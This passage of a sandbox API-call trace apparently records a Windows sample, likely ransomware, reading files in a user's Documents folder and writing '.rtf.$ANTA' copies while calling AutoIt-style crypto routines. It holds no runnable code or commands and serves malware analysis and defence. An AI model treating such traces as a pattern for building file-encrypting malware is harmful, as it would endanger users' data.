Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0082.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.662] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd")) returned 0x10 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0082.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0082.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.662] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\F0N0.rtf.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\f0n0.rtf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0082.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0082.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.663] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0082.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0082.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0082.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0082.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0082.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0082.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0082.663] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0082.663] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0082.664] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0082.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0082.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0082.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e03020 [0082.667] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0082.667] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x10000, lpOverlapped=0x0) returned 1 [0082.669] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x57d3, lpOverlapped=0x0) returned 1 [0082.669] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0082.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0082.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0082.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x157d3) returned 0x49aa010 [0082.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e03020 | out: hHeap=0x1780000) returned 1 [0082.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0082.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0082.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x157d3) returned 0x49bf7f0 [0082.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0082.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0082.672] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0082.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0082.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x157d3) returned 0x49aa010 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.673] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0082.673] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0082.673] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0082.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2cd0 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x157d3) returned 0x49aa010 [0082.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b90 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b50 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0082.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2bb0 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb3d8 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x157d3) returned 0x49d4fd0 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0082.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0082.675] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0082.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41acc40 [0082.675] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0082.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0082.675] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0082.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0082.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c00 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb3f0 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0082.676] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0082.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d04b8 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0082.677] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.677] HeapFree (in: hHeap=0x1780000, 